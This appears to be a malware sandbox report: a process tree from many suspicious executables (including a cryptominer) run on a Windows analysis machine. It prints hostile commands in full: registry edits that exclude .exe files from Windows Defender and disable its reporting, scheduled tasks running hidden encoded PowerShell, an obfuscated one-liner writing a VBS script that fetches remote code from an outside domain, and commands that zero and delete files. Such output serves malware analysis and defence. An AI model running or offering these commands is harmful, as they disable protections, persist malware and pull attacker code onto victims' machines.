  "C:\Users\Admin\Desktop\a\updates_installer.exe"
  2⤵
  - Executes dropped EXE
  PID:6124
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4552
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:6300
  - - C:\Users\Admin\AppData\Local\Temp\psaobpkuxifmhlhnaet.exe
      "C:\Users\Admin\AppData\Local\Temp\psaobpkuxifmhlhnaet.exe"
      4⤵
      PID:7040
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C timeout /T 2 /nobreak >nul & del "C:\Users\Admin\AppData\Local\Temp\psaobpkuxifmhlhnaet.exe"
        5⤵
        
        PID:6532
      - C:\Windows\system32\timeout.exe
        
        timeout /T 2 /nobreak
        6⤵
        Delays execution with timeout.exe
        
        PID:2360
  - - C:\Users\Admin\AppData\Local\Temp\kbsoevigduqtqdqhniv.exe
      "C:\Users\Admin\AppData\Local\Temp\kbsoevigduqtqdqhniv.exe"
      4⤵
      PID:6384
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c timeout /nobreak /t 3 & fsutil file setZeroData offset=0 length=65439 "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & erase "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & exit
      4⤵
      PID:8756
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /nobreak /t 3
        5⤵
        Delays execution with timeout.exe
        
        PID:6336
    - - C:\Windows\SysWOW64\fsutil.exe
        
        fsutil file setZeroData offset=0 length=65439 "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:1256
- C:\Users\Admin\Desktop\a\987123.exe
  "C:\Users\Admin\Desktop\a\987123.exe"
  2⤵
  - Executes dropped EXE
  PID:3488
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3488 -s 344
    3⤵
    - Program crash
    PID:1128
- C:\Users\Admin\Desktop\a\davincizx.exe
  "C:\Users\Admin\Desktop\a\davincizx.exe"
  2⤵
  - Executes dropped EXE
  PID:4820
- - C:\Users\Admin\Desktop\a\davincizx.exe
    "C:\Users\Admin\Desktop\a\davincizx.exe"
    3⤵
    PID:6196
- C:\Users\Admin\Desktop\a\setup.exe
  "C:\Users\Admin\Desktop\a\setup.exe"
  2⤵
  PID:6056
- - C:\Users\Admin\AppData\Local\Temp\7zSE4C4.tmp\Install.exe
    .\Install.exe
    3⤵
    PID:4772
  - - C:\Users\Admin\AppData\Local\Temp\7zSF713.tmp\Install.exe
      .\Install.exe /ydidihaIU "525403" /S
      4⤵
      PID:5280
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        5⤵
        
        PID:7000
      - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        6⤵
        
        PID:6464
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        7⤵
        
        PID:5848
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        7⤵
        
        PID:1328
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        5⤵
        
        PID:6580
      - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        6⤵
        
        PID:988
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        7⤵
        
        PID:2088
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        7⤵
        
        PID:6272
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gwURFOnaM" /SC once /ST 02:08:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        5⤵
        Creates scheduled task(s)
        
        PID:5608
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gwURFOnaM"
        5⤵
        
        PID:4868
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gwURFOnaM"
        5⤵
        
        PID:6624
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "beQScHXIENJXzyefGT" /SC once /ST 16:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\zGTXbDaaZIyYrGBFn\iDnfWbvbSnsqmHk\YObcqkr.exe\" Q8 /dasite_idQuD 525403 /S" /V1 /F
        5⤵
        Creates scheduled task(s)
        
        PID:220
- C:\Users\Admin\Desktop\a\tus.exe
  "C:\Users\Admin\Desktop\a\tus.exe"
  2⤵
  PID:6744
- C:\Users\Admin\Desktop\a\foto1661.exe
  "C:\Users\Admin\Desktop\a\foto1661.exe"
  2⤵
  PID:6456
- C:\Users\Admin\Desktop\a\kung.exe
  "C:\Users\Admin\Desktop\a\kung.exe"
  2⤵
  PID:6816
- - C:\Users\Admin\Desktop\a\kung.exe
    "C:\Users\Admin\Desktop\a\kung.exe"
    3⤵
    PID:1032
- - C:\Users\Admin\Desktop\a\kung.exe
    "C:\Users\Admin\Desktop\a\kung.exe"
    3⤵
    PID:5100
- C:\Users\Admin\Desktop\a\smss.exe
  "C:\Users\Admin\Desktop\a\smss.exe"
  2⤵
  PID:5592
- - C:\Users\Admin\Desktop\a\smss.exe
    "C:\Users\Admin\Desktop\a\smss.exe"
    3⤵
    PID:1468
- C:\Users\Admin\Desktop\a\sbin22zx.exe
  "C:\Users\Admin\Desktop\a\sbin22zx.exe"
  2⤵
  PID:1564
- - C:\Users\Admin\Desktop\a\sbin22zx.exe
    "C:\Users\Admin\Desktop\a\sbin22zx.exe"
    3⤵
    PID:6648
- C:\Users\Admin\Desktop\a\ImxyQs.exe
  "C:\Users\Admin\Desktop\a\ImxyQs.exe"
  2⤵
  PID:244
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c ipconfig /release
    3⤵
    PID:2984
  - - C:\Windows\SysWOW64\ipconfig.exe
      ipconfig /release
      4⤵
      Gathers network information
      PID:6940
- - C:\Users\Admin\AppData\Local\Temp\V02z6r.exe
    "C:\Users\Admin\AppData\Local\Temp\V02z6r.exe"
    3⤵
    PID:6804
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c ipconfig /renew
    3⤵
    PID:4116
  - - C:\Windows\SysWOW64\ipconfig.exe
      ipconfig /renew
      4⤵
      Gathers network information
      PID:7724
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    3⤵
    PID:7548
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7548 -s 576
      4⤵
      Program crash
      PID:7816
- C:\Users\Admin\Desktop\a\FX_432661.exe
  "C:\Users\Admin\Desktop\a\FX_432661.exe"
  2⤵
  PID:3920
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c echo|set /p=^"sq048=".":r54="i":y8628="g":k4js7=":":GetO^">%Public%\bjk6l9.vbs&echo|set /p=^"bject("sCr"+r54+"pt"+k4js7+"hT"+"Tps"+k4js7+"//m4gx"+sq048+"dns04"+sq048+"com//"+y8628+"1")^">>%Public%\bjk6l9.vbs&cd c:\windows\system32\&cmd /c start %Public%\bjk6l9.vbs
    3⤵
    PID:3420
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo"
      4⤵
      PID:4960
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" set /p="sq048=".":r54="i":y8628="g":k4js7=":":GetO" 1>C:\Users\Public\bjk6l9.vbs"
      4⤵
      PID:5936
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo"
      4⤵
      PID:1308
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("sCr"+r54+"pt"+k4js7+"hT"+"Tps"+k4js7+"//m4gx"+sq048+"dns04"+sq048+"com//"+y8628+"1")" 1>>C:\Users\Public\bjk6l9.vbs"
      4⤵
      PID:2744
  - - \??\c:\Windows\SysWOW64\cmd.exe
      cmd /c start C:\Users\Public\bjk6l9.vbs
      4⤵
      PID:5932
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Public\bjk6l9.vbs"
        5⤵
        
        PID:7012
- C:\Users\Admin\Desktop\a\newmar.exe
  "C:\Users\Admin\Desktop\a\newmar.exe"
  2⤵
  PID:6024
- - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
    "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
    3⤵
    PID:2560
  - - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
      "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
      4⤵
      PID:1352
- - C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
    "C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"
    3⤵
    PID:5684
- - C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe
    "C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"
    3⤵
    PID:796
- - C:\Users\Admin\AppData\Local\Temp\kos4.exe
    "C:\Users\Admin\AppData\Local\Temp\kos4.exe"
    3⤵
    PID:6576
  - - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
      "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
      4⤵
      PID:3336
    - - C:\Users\Admin\AppData\Local\Temp\is-1BD4B.tmp\LzmwAqmV.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-1BD4B.tmp\LzmwAqmV.tmp" /SL5="$E0390,3047247,224768,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        5⤵
        
        PID:6548
- - C:\Users\Admin\AppData\Local\Temp\latestX.exe
    "C:\Users\Admin\AppData\Local\Temp\latestX.exe"
    3⤵
    PID:5160
- C:\Users\Admin\Desktop\a\2.exe
  "C:\Users\Admin\Desktop\a\2.exe"
  2⤵
  PID:208
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 1200
    3⤵
    - Program crash
    PID:8764
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 1316
    3⤵
    - Program crash
    PID:9032
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 1196
    3⤵
    - Program crash
    PID:6984
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 1120
    3⤵
    - Program crash
    PID:4652
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 1172
    3⤵
    - Program crash
    PID:3932
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 1144
    3⤵
    - Program crash
    PID:7832
- C:\Users\Admin\Desktop\a\nalo.exe
  "C:\Users\Admin\Desktop\a\nalo.exe"
  2⤵
  PID:5604
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:1320
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 224
    3⤵
    - Program crash
    PID:1352
- C:\Users\Admin\Desktop\a\millianozx.exe
  "C:\Users\Admin\Desktop\a\millianozx.exe"
  2⤵
  PID:3044
- - C:\Users\Admin\Desktop\a\millianozx.exe
    "C:\Users\Admin\Desktop\a\millianozx.exe"
    3⤵
    PID:4880
- - C:\Users\Admin\Desktop\a\millianozx.exe
    "C:\Users\Admin\Desktop\a\millianozx.exe"
    3⤵
    PID:1664
- C:\Users\Admin\Desktop\a\cbchr.exe
  "C:\Users\Admin\Desktop\a\cbchr.exe"
  2⤵
  PID:2740
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "calc" /tr '"C:\Users\Admin\AppData\Roaming\calc.exe"' & exit
    3⤵
    PID:3304
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "calc" /tr '"C:\Users\Admin\AppData\Roaming\calc.exe"'
      4⤵
      Creates scheduled task(s)
      PID:2572
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp794E.tmp.bat""
    3⤵
    PID:3528
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:2088
  - - C:\Users\Admin\AppData\Roaming\calc.exe
      "C:\Users\Admin\AppData\Roaming\calc.exe"
      4⤵
      PID:7972
- C:\Users\Admin\Desktop\a\boblspsqgegf.exe
  "C:\Users\Admin\Desktop\a\boblspsqgegf.exe"
  2⤵
  PID:5524
- - C:\Windows\system32\taskkill.exe
    taskkill /im chrome.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:5132
- - C:\Windows\system32\taskkill.exe
    taskkill /im chrome.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:560
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-background-timer-throttling --disable-backgrounding-occluded-windows --disable-breakpad --disable-client-side-phishing-detection --disable-component-extensions-with-background-pages --disable-default-apps --disable-dev-shm-usage --disable-features=site-per-process,TranslateUI --disable-hang-monitor --disable-ipc-flooding-protection --disable-popup-blocking --disable-prompt-on-repost --disable-renderer-backgrounding --disable-sync --enable-automation --enable-features=NetworkService,NetworkServiceInProcess --force-color-profile=srgb --headless --metrics-recording-only --no-first-run --no-startup-window --remote-debugging-port=0 --use-mock-keychain --user-data-dir=C:\Users\Admin\AppData\Local\Temp\rod\user-data\dd3ba7e2d58bb649
    3⤵
    PID:5260
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\rod\user-data\dd3ba7e2d58bb649 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\rod\user-data\dd3ba7e2d58bb649\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\rod\user-data\dd3ba7e2d58bb649 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffb484b9758,0x7ffb484b9768,0x7ffb484b9778
      4⤵
      PID:4132
- C:\Users\Admin\Desktop\a\newumma.exe
  "C:\Users\Admin\Desktop\a\newumma.exe"
  2⤵
  PID:1472
- C:\Users\Admin\Desktop\a\ca.exe
  "C:\Users\Admin\Desktop\a\ca.exe"
  2⤵
  PID:6752
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6752 -s 788
    3⤵
    - Program crash
    PID:6764
- C:\Users\Admin\Desktop\a\fra.exe
  "C:\Users\Admin\Desktop\a\fra.exe"
  2⤵
  PID:2040
- C:\Users\Admin\Desktop\a\bus50.exe
  "C:\Users\Admin\Desktop\a\bus50.exe"
  2⤵
  PID:6748
- - C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\uG6ZH63.exe
    C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\uG6ZH63.exe
    3⤵
    PID:6700
  - - C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\my4Ne78.exe
      C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\my4Ne78.exe
      4⤵
      PID:6120
    - - C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\Th5qg65.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\Th5qg65.exe
        5⤵
        
        PID:3556
      - C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\HF5wy04.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\HF5wy04.exe
        6⤵
        
        PID:2656
        
        C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\3Ls95mp.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\3Ls95mp.exe
        7⤵
        
        PID:4524
      - C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\4VC199lM.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\4VC199lM.exe
        6⤵
        
        PID:5612
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        7⤵
        
        PID:6432
    - - C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\5jK5Mt1.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\5jK5Mt1.exe
        5⤵
        
        PID:7392
  - - C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\6nr9Bf8.exe
      C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\6nr9Bf8.exe
      4⤵
      PID:7484
- - C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\7Sg7pO85.exe
    C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\7Sg7pO85.exe
    3⤵
    PID:7924
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7969.tmp\796A.tmp\796B.bat C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\7Sg7pO85.exe"
      4⤵
      PID:6204
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
        5⤵
        
        PID:4672
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x174,0x178,0x17c,0x150,0x180,0x7ffb483b46f8,0x7ffb483b4708,0x7ffb483b4718
        6⤵
        
        PID:8624
- C:\Users\Admin\Desktop\a\Veeam.Backup.Service.exe
  "C:\Users\Admin\Desktop\a\Veeam.Backup.Service.exe"
  2⤵
  PID:6524
- C:\Users\Admin\Desktop\a\chungzx.exe
  "C:\Users\Admin\Desktop\a\chungzx.exe"
  2⤵
  PID:2212
- - C:\Users\Admin\Desktop\a\chungzx.exe
    "C:\Users\Admin\Desktop\a\chungzx.exe"
    3⤵
    PID:7464
- - C:\Users\Admin\Desktop\a\chungzx.exe
    "C:\Users\Admin\Desktop\a\chungzx.exe"
    3⤵
    PID:7468
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "
      4⤵
      PID:8420
    - - C:\Windows\SysWOW64\PING.EXE
        
        PING 127.0.0.1 -n 2
        5⤵
        Runs ping.exe
        
        PID:8740
    - - C:\Windows\Microsoft Media Session\Windows Sessions Start.exe
        
        "C:\Windows\Microsoft Media Session\Windows Sessions Start.exe"
        5⤵
        
        PID:7748
- C:\Users\Admin\Desktop\a\xmrig.exe
  "C:\Users\Admin\Desktop\a\xmrig.exe"
  2⤵
  PID:5928
- C:\Users\Admin\Desktop\a\WatchDog.exe
  "C:\Users\Admin\Desktop\a\WatchDog.exe"
  2⤵
  PID:4520
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 1352
    3⤵
    - Program crash
    PID:7628
- C:\Users\Admin\Desktop\a\damianozx.exe
  "C:\Users\Admin\Desktop\a\damianozx.exe"
  2⤵
  PID:5916
- - C:\Users\Admin\Desktop\a\damianozx.exe
    "C:\Users\Admin\Desktop\a\damianozx.exe"
    3⤵
    PID:7284
- C:\Users\Admin\Desktop\a\ch.exe
  "C:\Users\Admin\Desktop\a\ch.exe"
  2⤵
  PID:6304
- C:\Users\Admin\Desktop\a\undergroundzx.exe
  "C:\Users\Admin\Desktop\a\undergroundzx.exe"
  2⤵
  PID:6052
- - C:\Users\Admin\Desktop\a\undergroundzx.exe
    "C:\Users\Admin\Desktop\a\undergroundzx.exe"
    3⤵
    PID:4808
- C:\Users\Admin\Desktop\a\Random.exe
  "C:\Users\Admin\Desktop\a\Random.exe"
  2⤵
  PID:220
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    3⤵
    PID:900
  - - C:\Users\Admin\Pictures\feLUXw6j8h33mNKxybzLVFj2.exe
      "C:\Users\Admin\Pictures\feLUXw6j8h33mNKxybzLVFj2.exe"
      4⤵
      PID:7880
    - - C:\Users\Admin\Pictures\feLUXw6j8h33mNKxybzLVFj2.exe
        
        "C:\Users\Admin\Pictures\feLUXw6j8h33mNKxybzLVFj2.exe"
        5⤵
        
        PID:8176
  - - C:\Users\Admin\Pictures\pEqNU2Q29ABCdspkx3BnIclt.exe
      "C:\Users\Admin\Pictures\pEqNU2Q29ABCdspkx3BnIclt.exe"
      4⤵
      PID:2024
  - - C:\Users\Admin\Pictures\GYe8RPx6UwF7nhgVLKsFAUvs.exe
      "C:\Users\Admin\Pictures\GYe8RPx6UwF7nhgVLKsFAUvs.exe"
      4⤵
      PID:8056
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:5640
  - - C:\Users\Admin\Pictures\Gfl34S5DpuLl0gYyPWJ87rhB.exe
      "C:\Users\Admin\Pictures\Gfl34S5DpuLl0gYyPWJ87rhB.exe"
      4⤵
      PID:7876
  - - C:\Users\Admin\Pictures\eCuBaeQCg292tI657a5XOTJG.exe
      "C:\Users\Admin\Pictures\eCuBaeQCg292tI657a5XOTJG.exe"
      4⤵
      PID:7904
  - - C:\Users\Admin\Pictures\jiL99wt4MnoC2JvWGss8BQKB.exe
      "C:\Users\Admin\Pictures\jiL99wt4MnoC2JvWGss8BQKB.exe"
      4⤵
      PID:5544
  - - C:\Users\Admin\Pictures\hAd14g88341jX7oS4X1RXbod.exe
      "C:\Users\Admin\Pictures\hAd14g88341jX7oS4X1RXbod.exe"
      4⤵
      PID:6160
  - - C:\Users\Admin\Pictures\0drEgei7i9wEauQr5kfa8MH9.exe
      "C:\Users\Admin\Pictures\0drEgei7i9wEauQr5kfa8MH9.exe"
      4⤵
      PID:3060
  - - C:\Users\Admin\Pictures\XOnyzJ4aag5wsRn1wIrQeYGM.exe
      "C:\Users\Admin\Pictures\XOnyzJ4aag5wsRn1wIrQeYGM.exe"
      4⤵
      PID:7964
    - - C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\1powerreduceproie.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\1powerreduceproie.exe
        5⤵
        
        PID:5132
      - C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\1powerreducepro.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\1powerreducepro.exe
        6⤵
        
        PID:2792
  - - C:\Users\Admin\Pictures\LF4lxdjBnesEKUAMir3f3Z4j.exe
      "C:\Users\Admin\Pictures\LF4lxdjBnesEKUAMir3f3Z4j.exe" --silent --allusers=0
      4⤵
      PID:8004
    - - C:\Users\Admin\Pictures\LF4lxdjBnesEKUAMir3f3Z4j.exe
        
        C:\Users\Admin\Pictures\LF4lxdjBnesEKUAMir3f3Z4j.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=104.0.4944.33 --initial-client-data=0x30c,0x310,0x314,0x2e8,0x318,0x69535648,0x69535658,0x69535664
        5⤵
        
        PID:5308
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\LF4lxdjBnesEKUAMir3f3Z4j.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\LF4lxdjBnesEKUAMir3f3Z4j.exe" --version
        5⤵
        
        PID:4152
  - - C:\Users\Admin\Pictures\qwi8XyeiGsP5cWqbBzl5UeF8.exe
      "C:\Users\Admin\Pictures\qwi8XyeiGsP5cWqbBzl5UeF8.exe"
      4⤵
      PID:8044
- C:\Users\Admin\Desktop\a\Ads.exe
  "C:\Users\Admin\Desktop\a\Ads.exe"
  2⤵
  PID:2512
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    3⤵
    PID:6280
  - - C:\Users\Admin\Pictures\05QMH1FESje6SklHSvu1vpSL.exe
      "C:\Users\Admin\Pictures\05QMH1FESje6SklHSvu1vpSL.exe"
      4⤵
      PID:7420
  - - C:\Users\Admin\Pictures\wvD6PIpS9oziGx9iHxGjwKGL.exe
      "C:\Users\Admin\Pictures\wvD6PIpS9oziGx9iHxGjwKGL.exe"
      4⤵
      PID:7396
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\8537768519.exe"
        5⤵
        
        PID:8928
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "wvD6PIpS9oziGx9iHxGjwKGL.exe" /f & erase "C:\Users\Admin\Pictures\wvD6PIpS9oziGx9iHxGjwKGL.exe" & exit
        5⤵
        
        PID:6384
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7396 -s 1464
        5⤵
        Program crash
        
        PID:8684
  - - C:\Users\Admin\Pictures\sPSyw06ZiYCLP8HSbMFOssHz.exe
      "C:\Users\Admin\Pictures\sPSyw06ZiYCLP8HSbMFOssHz.exe"
      4⤵
      PID:7624
    - - C:\Users\Admin\AppData\Local\Temp\is-S1H6A.tmp\sPSyw06ZiYCLP8HSbMFOssHz.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-S1H6A.tmp\sPSyw06ZiYCLP8HSbMFOssHz.tmp" /SL5="$4096A,3023043,224768,C:\Users\Admin\Pictures\sPSyw06ZiYCLP8HSbMFOssHz.exe"
        5⤵
        
        PID:7416
